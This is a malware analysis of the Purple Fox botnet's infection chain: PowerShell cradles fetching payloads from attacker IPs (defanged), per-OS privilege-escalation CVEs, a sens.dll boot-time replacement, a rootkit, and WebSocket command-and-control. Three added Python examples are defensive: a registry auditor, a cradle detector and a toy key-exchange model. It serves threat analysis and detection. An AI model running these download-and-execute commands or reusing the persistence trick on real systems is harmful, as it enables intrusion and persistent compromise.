The activity starts with one of the following PowerShell commands being executed (URLs defanged):
"cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp[:]//103.228.112.246[:]17881/57BC9B7E.Png');MsiMake hxxp[:]//103.228.112.246[:]17881/0CFA042F.Png"
"cmd.exe" /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('hxxp[:]//117.187.136.141[:]13405/57BC9B7E.Png');MsiMake hxxp[:]//117.187.136.141[:]13405/0CFA042F.Png"
These commands fetch a payload from the listed URLs, which are hosted on several compromised servers that belong to the PurpleFox botnet, most of them located in China. The fetched content is passed straight to IEX (Invoke-Expression), so it runs in memory without touching disk at this stage; the .Png extension is only a disguise, since what is served is PowerShell, not an image.
The fetched payload is a long script made up of three components:
- Tater (Hot Potato, privilege escalation)
- PowerSploit
- an embedded exploit bundle binary (privilege escalation)
The script targets 64-bit systems only.
It starts by checking the Windows version and which hotfixes are installed, so that it can pick a vulnerability that is still unpatched on the host:
- Windows 7 / Windows Server 2008:
  CVE-2020-1054 (hotfixes checked: KB4556836, KB4556843)
  CVE-2019-0808 (hotfixes checked: KB4489878, KB4489885, KB2882822)
- Windows 8 / Windows Server 2012:
  CVE-2019-1458 (hotfixes checked: KB4530702, KB4530730)
- Windows 10 / Windows Server 2019:
  CVE-2021-1732 (hotfixes checked: KB4601354, KB4601345, KB4601315, KB4601319)
After picking the vulnerability that fits the host, the script uses the PowerSploit module to reflectively load the embedded exploit bundle binary in memory, passing the chosen vulnerability and an MSI install command as arguments. If the exploit fails, it falls back to the Tater (Hot Potato) module to launch the same MSI command.
Either way, the goal is to install the MSI package with administrative rights and without any user interaction.
The MSI package starts by removing the following registry keys, which belong to older Purple Fox installations if any are present:
HKLM\SYSTEM\CurrentControlSet\Services\{ac00-ac10}
It then installs the Purple Fox backdoor components (dbcode21mk.log and setupact64.log) into the Windows directory and sets two values under the key HKLM\SYSTEM\CurrentControlSet\Control\Session Manager:
- AllowProtectedRenames = 0x1
- PendingFileRenameOperations (the queued rename that will put the backdoor in place of sens.dll)
The MSI package then runs a .vbs script that creates a Windows Firewall rule blocking incoming connections on ports 135, 139, and 445. As a final step, the system is restarted so that the queued rename takes effect: the Session Manager (smss.exe) processes PendingFileRenameOperations early in boot, before services start, and replaces sens.dll, so from then on the malware runs inside the System Event Notification Service (SENS). AllowProtectedRenames = 1 is what allows that boot-time rename to overwrite a file Windows would otherwise protect. Both registry values and the firewall rule are visible on the host between the MSI run and the reboot, which is the window in which the infection is easiest to spot, since the rootkit driver only loads after the restart.
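The pre-reboot state described above can be audited directly. The following is an added example, not code from the original analysis: it decodes the PendingFileRenameOperations MULTI_SZ into (source, destination) pairs, using the documented conventions that an empty destination means "delete at boot" and a leading "!" means "replace the existing file", and combines the result with AllowProtectedRenames to reach a verdict. The sample registry data is constructed, and the staging file name in it is an assumption; on a Windows host the same functions run over values read with winreg.

```python
"""Added example, not part of the original analysis: decode the Session Manager
values the MSI sets and flag a boot-time rename that overwrites a System32 DLL.
The sample data below is constructed; the staging file name is an assumption."""
import sys
from typing import Dict, List, Optional

SESSION_MANAGER_KEY = r"SYSTEM\CurrentControlSet\Control\Session Manager"
PROTECTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


class RenameOp:
    """One (source, destination) pair from the PendingFileRenameOperations MULTI_SZ.

    smss.exe applies these at boot: an empty destination deletes the source, and a
    destination prefixed with '!' replaces an existing file (MOVEFILE_REPLACE_EXISTING)."""

    def __init__(self, source: str, destination: str) -> None:
        self.source = _strip_nt_prefix(source)
        self.delete = destination == ""
        self.replaces_existing = destination.startswith("!")
        self.target: Optional[str] = (
            None if self.delete else _strip_nt_prefix(destination.lstrip("!"))
        )


def _strip_nt_prefix(path: str) -> str:
    # Values use NT object paths such as \??\C:\Windows\...; drop the \??\ prefix.
    return path[4:] if path.startswith("\\??\\") else path


def parse_pending_renames(multi_sz: List[str]) -> List[RenameOp]:
    """Split the MULTI_SZ string list into source/destination pairs."""
    items = list(multi_sz)
    if len(items) % 2:            # malformed trailing source: treat it as a delete
        items.append("")
    return [RenameOp(src, dst) for src, dst in zip(items[0::2], items[1::2])]


def system_overwrites(ops: List[RenameOp]) -> List[str]:
    """Targets under System32/SysWOW64 whose existing file will be replaced."""
    return [
        op.target for op in ops
        if op.target and op.replaces_existing
        and op.target.lower().startswith(PROTECTED_DIRS)
    ]


def assess(values: Dict[str, object]) -> Dict[str, object]:
    """values maps the two value names to their data (None when absent)."""
    ops = parse_pending_renames(values.get("PendingFileRenameOperations") or [])
    hits = system_overwrites(ops)
    allow = values.get("AllowProtectedRenames") == 1
    if hits and allow:
        verdict = "suspicious"      # exactly the pair the Purple Fox MSI sets
    elif hits:
        verdict = "review"          # Windows updates also stage System32 replacements
    else:
        verdict = "clean"
    return {"allow_protected_renames": allow, "system_overwrites": hits, "verdict": verdict}


def read_live_values() -> Dict[str, object]:
    """Read the real values on a Windows host (winreg returns MULTI_SZ as a list)."""
    import winreg  # standard library, Windows only
    out: Dict[str, object] = {}
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, SESSION_MANAGER_KEY) as key:
        for name in ("AllowProtectedRenames", "PendingFileRenameOperations"):
            try:
                out[name] = winreg.QueryValueEx(key, name)[0]
            except FileNotFoundError:
                out[name] = None
    return out


# Constructed sample mirroring the state the MSI leaves behind before the reboot.
SAMPLE_INFECTED: Dict[str, object] = {
    "AllowProtectedRenames": 1,
    "PendingFileRenameOperations": [
        r"\??\C:\Windows\Temp\stage.tmp",          # assumed staging file name
        r"!\??\C:\Windows\System32\sens.dll",      # '!' -> replace the SENS service DLL
        r"\??\C:\Windows\Temp\msi_cleanup.tmp",
        "",                                        # empty destination -> delete at boot
    ],
}
SAMPLE_BENIGN: Dict[str, object] = {
    "AllowProtectedRenames": None,
    "PendingFileRenameOperations": [r"\??\C:\Users\alice\old.log", ""],
}

if __name__ == "__main__":
    data = read_live_values() if sys.platform == "win32" else SAMPLE_INFECTED
    print(assess(data))
```

A non-empty PendingFileRenameOperations on its own is not evidence of anything; installers and Windows Update queue renames routinely, which is why a System32 replacement without AllowProtectedRenames only earns "review". The combination of a replace ("!") of a service DLL from a path outside the Windows system directories together with AllowProtectedRenames set to 1 is the pattern worth alerting on.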
The installed malware is a DLL protected with VMProtect. Using the other data file dropped by the MSI package, it unpacks and manually loads the DLLs that provide its functionality.
It also carries a rootkit driver, likewise unpacked from the data file, which hides its files, registry keys, and processes. On start, the sample copies itself to another file, installs a new service, and then restores the original sens.dll.
It then loads the driver to hide its files and registry keys, and spawns a sequence of 32-bit processes into which it injects its code modules, since those modules are 32-bit DLLs.
The activity that retrieved this backdoor was captured three days after the earlier PurpleFox intrusion attempts on the same compromised server.
Analysts flagged the following suspicious PowerShell commands:
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/1'))"
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/2'))"
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/3'))"
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/4'))"
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/5'))"
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/8'))"
"cmd.exe" /c powershell -c "iex((new-object Net.WebClient).DownloadString('hxxp[:]//185.112.144.245/a/9'))"
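Both sets of commands, the ones at the start of the analysis and the seven just listed, are the same download-and-execute cradle, and one detection serves both. The following is an added example, not code from the original analysis: it scores a process-creation command line (the CommandLine field of Sysmon Event ID 1 or Security event 4688) against a small set of indicators and fires only when the download and the in-memory execution appear together, because the second set of commands drops the -nop and -exec bypass flags that a naive rule would key on. As a generalisation beyond the quoted commands it also decodes a -EncodedCommand argument before matching. The sample command lines are constructed from the quoted commands with the defanging removed, and the indicator weights are this example's own choice.

```python
"""Added example, not from the original analysis: score process-creation
command lines for the PowerShell download-and-execute cradle seen in both
sets of commands above.  Sample command lines are constructed from the quoted
commands with the defanging removed; indicator weights are this example's own."""
import base64
import re
from typing import List, Tuple

# (name, pattern, weight).  The verdict requires the download + execute pair
# rather than -nop/-exec bypass, because the second set of commands omits
# those flags entirely and a rule keyed on them would miss it.
INDICATORS = [
    ("iex", re.compile(r"\b(?:iex|invoke-expression)\b", re.I), 3),
    ("downloadstring", re.compile(r"\.downloadstring\s*\(", re.I), 3),
    ("webclient", re.compile(r"net\.webclient", re.I), 1),
    ("exec_bypass", re.compile(r"-(?:exec|ep|executionpolicy)\s+bypass", re.I), 1),
    ("noprofile", re.compile(r"-nop\b|-noprofile\b", re.I), 1),
    # literal IP instead of a hostname, and a port other than 80/443
    ("ip_url", re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}(?::\d+)?/", re.I), 2),
    ("odd_port", re.compile(r"https?://[^/\s'\"]+:(?!80\b|443\b)\d+/", re.I), 1),
    # script fetched from a URL dressed up as an image (the .Png payloads above)
    ("image_ext_script", re.compile(
        r"downloadstring\s*\(\s*['\"][^'\"]+\.(?:png|jpg|gif)['\"]", re.I), 2),
]
ENCODED_FLAG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
URL_RE = re.compile(r"https?://[^\s'\"()<>]+", re.I)


def expand_encoded(cmdline: str) -> str:
    """Append the decoded -EncodedCommand text (base64 of UTF-16LE) so the same
    indicators catch an encoded variant of the cradle."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return cmdline
    try:
        return cmdline + " " + base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline


def score(cmdline: str) -> Tuple[int, List[str]]:
    text = expand_encoded(cmdline)
    hits = [name for name, rx, _ in INDICATORS if rx.search(text)]
    return sum(w for name, _, w in INDICATORS if name in hits), hits


def is_cradle(cmdline: str) -> bool:
    """Fire only on the download + in-memory execute pair: IEX alone is common
    in legitimate scripts, and a plain download is not execution."""
    hits = score(cmdline)[1]
    return "iex" in hits and "downloadstring" in hits


def extract_urls(cmdline: str) -> List[str]:
    """Pull the stager URLs out for blocking and pivoting."""
    return URL_RE.findall(expand_encoded(cmdline))


SAMPLE_COMMAND_LINES = [  # constructed from the commands quoted in the analysis
    'cmd.exe /c powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient)'
    ".DownloadString('http://103.228.112.246:17881/57BC9B7E.Png');"
    'MsiMake http://103.228.112.246:17881/0CFA042F.Png"',
    'cmd.exe /c powershell -c "iex((new-object Net.WebClient)'
    ".DownloadString('http://185.112.144.245/a/1'))\"",
    "powershell.exe -Command Get-Process | Sort-Object CPU",      # benign
    'powershell -c "IEX (Get-Content .\\build.ps1 -Raw)"',         # IEX, no download
]
# The second cradle wrapped in -EncodedCommand, as a stager might deliver it.
ENCODED_SAMPLE = "powershell -w hidden -enc " + base64.b64encode(
    "iex((new-object Net.WebClient).DownloadString('http://185.112.144.245/a/2'))"
    .encode("utf-16-le")).decode()

if __name__ == "__main__":
    for line in SAMPLE_COMMAND_LINES + [ENCODED_SAMPLE]:
        print(is_cradle(line), score(line), extract_urls(line))
```

The score is there for triage ordering; the boolean verdict deliberately ignores it, so a command line with nothing but IEX and DownloadString still fires, while an IEX over a local file does not. Parent process (cmd.exe spawning powershell, as in every command above) is a useful extra field to join on when the log source provides it.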
One characteristic analysts rarely see in malware is the use of WebSocket for C&C communication, which gives an efficient bidirectional channel between the infected client and the server.
WebSocket lets a client and a server exchange streams of data in both directions over a single long-lived TCP session, unlike the request/response pattern of plain HTTP.
For the threat actor this is a quieter alternative to repeated HTTP requests: once the connection is upgraded, beaconing and exfiltration no longer appear as discrete requests and responses, so controls that inspect each HTTP transaction have less to match on. The channel is not invisible, though. It still begins with an HTTP Upgrade handshake (the Upgrade: websocket and Sec-WebSocket-Key headers), and a long-lived WebSocket opened by a process that is not a browser is itself a useful detection signal.
The client verifies the signed message using the RSA public key loaded from the configuration payload shown in the previous section.
If the signature checks out, key material derived from the DH exchange is saved as the permanent symmetric AES key (the Symmetric_AES_key variable) and is used for as long as the WebSocket channel stays open. Tying the DH value to a signature that only the operator's RSA private key can produce is what stops a sinkholed or on-path host from negotiating a session key with the implant.
Once the encrypted session is in place, the client fingerprints the machine, collecting the username, machine name, local IP address, MAC address, and Windows version, and sends this data over the secure channel so the victim can be profiled on the server side. This is the final exchange before the WebSocket channel is considered fully established.
It then listens for further commands, which are covered in the next section.
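The session setup just described, as an added example that is not the malware's code and not from the original analysis: the server signs its ephemeral Diffie-Hellman value with RSA, the client verifies that signature with the RSA public key it carries in its configuration, both sides derive the same session key, and the client sends its fingerprint under that key. Everything cryptographic here is a toy chosen so the example runs with the standard library alone: a Mersenne-prime DH group, a three-prime textbook RSA key with no padding, and an HMAC-SHA256 keystream standing in for the AES the real implant uses. The fingerprint values are constructed, and the run_session helper with its tamper flag is this example's own device for showing why the signature matters.

```python
"""Added example, not the malware's code: a stdlib-only model of the WebSocket
session setup described above.  Toy parameters throughout (Mersenne-prime DH
group, three-prime textbook RSA without padding, HMAC-SHA256 keystream in
place of AES).  Demo only; do not reuse for anything real."""
import hashlib
import hmac
import json
import secrets
from typing import Dict, Tuple

DH_P = 2**521 - 1          # Mersenne prime M521; g = 3 assumed adequate for a demo
DH_G = 3
DH_LEN = 66                # bytes needed to hold a 521-bit value

# RSA modulus from three Mersenne primes so n > 2**256 and a SHA-256 digest fits.
_P, _Q, _R = 2**127 - 1, 2**107 - 1, 2**89 - 1
RSA_N, RSA_E = _P * _Q * _R, 65537
RSA_D = pow(RSA_E, -1, (_P - 1) * (_Q - 1) * (_R - 1))   # Python 3.8+


def _digest_int(msg: bytes) -> int:
    return int.from_bytes(hashlib.sha256(msg).digest(), "big")


def rsa_sign(d: int, msg: bytes) -> int:
    return pow(_digest_int(msg), d, RSA_N)


def rsa_verify(e: int, msg: bytes, sig: int) -> bool:
    return pow(sig, e, RSA_N) == _digest_int(msg)


def derive_key(shared: int) -> bytes:
    """Permanent symmetric key for the session (the Symmetric_AES_key)."""
    return hashlib.sha256(b"purplefox-ws-demo" + shared.to_bytes(DH_LEN, "big")).digest()


def server_hello(d: int) -> Tuple[int, Dict[str, int]]:
    """Server side: fresh DH value plus an RSA signature over it."""
    a = secrets.randbelow(DH_P - 2) + 1
    pub = pow(DH_G, a, DH_P)
    return a, {"dh_pub": pub, "sig": rsa_sign(d, pub.to_bytes(DH_LEN, "big"))}


def client_hello(config_e: int, hello: Dict[str, int]) -> Tuple[bytes, Dict[str, int]]:
    """Client side: reject the server's DH value unless the configured RSA key
    signed it; this is what stops an on-path host substituting its own value."""
    pub = hello["dh_pub"]
    if not rsa_verify(config_e, pub.to_bytes(DH_LEN, "big"), hello["sig"]):
        raise ValueError("server DH value is not signed by the configured RSA key")
    b = secrets.randbelow(DH_P - 2) + 1
    return derive_key(pow(pub, b, DH_P)), {"dh_pub": pow(DH_G, b, DH_P)}


def server_finish(a: int, reply: Dict[str, int]) -> bytes:
    return derive_key(pow(reply["dh_pub"], a, DH_P))


def _keystream(key: bytes, nonce: bytes, n: int) -> bytes:
    # HMAC in counter mode: a stand-in for AES, which the stdlib lacks.
    blocks = (n + 31) // 32
    return b"".join(hmac.new(key, nonce + i.to_bytes(4, "big"), hashlib.sha256).digest()
                    for i in range(blocks))[:n]


def seal(key: bytes, plaintext: bytes) -> bytes:
    nonce = secrets.token_bytes(16)
    ct = bytes(p ^ s for p, s in zip(plaintext, _keystream(key, nonce, len(plaintext))))
    return nonce + ct + hmac.new(key, nonce + ct, hashlib.sha256).digest()


def open_sealed(key: bytes, blob: bytes) -> bytes:
    nonce, ct, tag = blob[:16], blob[16:-32], blob[-32:]
    if not hmac.compare_digest(tag, hmac.new(key, nonce + ct, hashlib.sha256).digest()):
        raise ValueError("bad tag")
    return bytes(c ^ s for c, s in zip(ct, _keystream(key, nonce, len(ct))))


def run_session(tamper: bool = False) -> Dict[str, object]:
    """Full exchange.  tamper=True models an on-path attacker replacing the
    server's DH value, which it cannot re-sign without the RSA private key."""
    a, hello = server_hello(RSA_D)
    if tamper:
        hello = dict(hello, dh_pub=pow(DH_G, secrets.randbelow(DH_P - 2) + 1, DH_P))
    try:
        client_key, reply = client_hello(RSA_E, hello)
    except ValueError as exc:
        return {"established": False, "reason": str(exc)}
    server_key = server_finish(a, reply)
    profile = {"user": "alice", "host": "WS-01", "ip": "10.0.0.5",   # constructed
               "mac": "00:11:22:33:44:55", "os": "10.0.19044"}
    received = json.loads(open_sealed(server_key, seal(client_key, json.dumps(profile).encode())))
    return {"established": client_key == server_key, "profile": received}


if __name__ == "__main__":
    print(run_session())
    print(run_session(tamper=True))
```

The point the tamper path makes is the one the analysis implies: because the implant only trusts a DH value signed by the key baked into its configuration, sinkholing the C&C address is not enough to talk to it, and the signing key is the asset a defender would need to recover from the operator's infrastructure to impersonate the server.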